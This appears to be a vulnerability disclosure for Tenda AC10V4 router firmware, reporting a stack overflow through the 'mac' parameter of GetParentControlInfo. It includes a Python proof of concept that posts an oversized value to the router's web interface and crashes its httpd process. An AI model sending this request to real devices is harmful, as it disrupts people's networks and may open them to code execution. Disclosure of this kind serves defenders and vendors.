vendor:Tenda
product:AC10V4
version:US_AC10V4.0si_V16.03.10.13_cn_TDC01
type:Stack Overflow
Tenda AC10V4.0 si_V16.03.10.13_cn_TDC01 were discovered to contain a stack overflow via the mac parameter in the GetParentControlInfo function.
In function GetParentControlInfo line 35, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution.
Run poc and you will see process httpd crash, segmentation fault.
import requests
host = "192.168.59.136:80"
cy = b'a'*1000
def exploit_GetParentControlInfo():
url = f"http://{host}/goform/GetParentControlInfo"
data = {
b'mac':cy
}
res = requests.post(url=url,data=data)
print(res.content)
exploit_GetParentControlInfo()